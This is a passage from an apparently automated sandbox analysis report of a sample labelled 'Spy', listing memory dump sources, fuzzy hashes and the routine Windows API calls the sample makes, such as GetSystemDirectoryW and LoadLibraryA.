                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
                                                      • Instruction ID: e1df1ceb6e1433a89597c922871f40940a4c5e6f043e593278714e74eff40441
                                                      • Opcode Fuzzy Hash: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
                                                      • Instruction Fuzzy Hash: A0E06D702503118FD330AF29E504B827AE4AF04744F108A6DE457C3341DFF5E544CBA2
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00AC0091
                                                        • Part of subcall function 00AFC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                        • Part of subcall function 00AFC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AC0289
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
                                                      • Instruction ID: 0d8a93b157c2d88d768de5fc104f38e31fea317965bb656f77d7834271e51657
                                                      • Opcode Fuzzy Hash: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
                                                      • Instruction Fuzzy Hash: E9F03970804109DFCB15EBA0CA88FECBBB8AB08300F260089E106B31A0CBB04F80DF21